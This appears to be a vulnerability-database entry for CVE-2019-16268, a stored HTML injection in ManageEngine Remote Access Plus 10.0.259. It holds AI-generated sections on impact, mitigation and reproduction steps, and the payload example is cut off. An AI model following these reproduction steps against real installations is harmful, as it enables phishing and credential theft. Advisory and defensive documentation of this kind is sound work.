CVE-2019-16268
Description
Zoho ManageEngine Remote Access Plus 10.0.259 allows HTML injection via the Description field on the Admin - User Administration userMgmt.do?actionToCall=ShowUser screen.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
ManageEngine Remote Access Plus 10.0.259 is vulnerable to HTML injection via the Description field, allowing attackers to inject arbitrary HTML code.
Vulnerability
ManageEngine Remote Access Plus version 10.0.259 is vulnerable to HTML injection via the Description field on the Admin - User Administration screen (userMgmt.do?actionToCall=ShowUser). An attacker with valid credentials can inject arbitrary HTML code into the Description parameter when creating or editing a role. The issue was fixed in build 100454 released on March 18, 2020 [1][2].
Exploitation
An attacker must first authenticate with valid credentials. Then, navigating to Admin > User Administration > Roles, they can click "+Add Role" and insert a malicious HTML payload into the Description field. The injected HTML is stored and executed when the page is rendered. Attackers could craft a link leading to a page containing the injection and send it to a victim, leveraging trust in the domain to perform phishing attacks [1].
Impact
Successful exploitation allows an attacker to inject arbitrary HTML code into the vulnerable page. This can be used to display fake login forms, misleading content, or other social engineering attacks to steal credentials or sensitive information. The vulnerability does not lead to direct code execution but facilitates client-side attacks [1].
Mitigation
ManageEngine released a fix in Remote Access Plus build 100454 on March 18, 2020. Users should update to the latest build available from the ManageEngine website. The cloud version of Remote Access Plus is not affected. No workaround is documented [2].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Zoho ManageEngine/Remote Access Plusdescription
- Range: = 10.0.259
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization on the Description field allows arbitrary HTML to be stored and rendered in the browser."
Attack vector
An attacker with valid login credentials navigates to the Roles section, clicks the +Add Role button, and injects arbitrary HTML into the Description parameter. The injected HTML is stored and rendered when the page is viewed, enabling a phishing scenario where the attacker crafts a malicious link, sends it to a victim via email, and the victim—trusting the legitimate domain—enters credentials that are exfiltrated to the attacker's server [ref_id=1].
Affected code
The vulnerability exists in the Admin - User Administration screen at the endpoint `userMgmt.do?actionToCall=ShowUser`. The Description field on the Add Role form does not sanitize user-supplied input, allowing arbitrary HTML to be stored and rendered [ref_id=1].
What the fix does
The advisory recommends filtering metacharacters from user input to prevent HTML injection [ref_id=1]. No patch diff is provided in the bundle, so the specific code changes are not available; the vendor would need to apply output encoding or input sanitization on the Description field and other vulnerable parameters.
Preconditions
- authAttacker must have valid login credentials to access the ManageEngine Remote Access Plus application.
- configThe application must be running ManageEngine Remote Access Plus version 10.0.259.
- networkAttacker must have network access to the application's web interface.
Reproduction
1. Log in with valid credentials and navigate to the Roles section. 2. Click the +Add Role button. 3. Insert an HTML injection payload (e.g., `
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.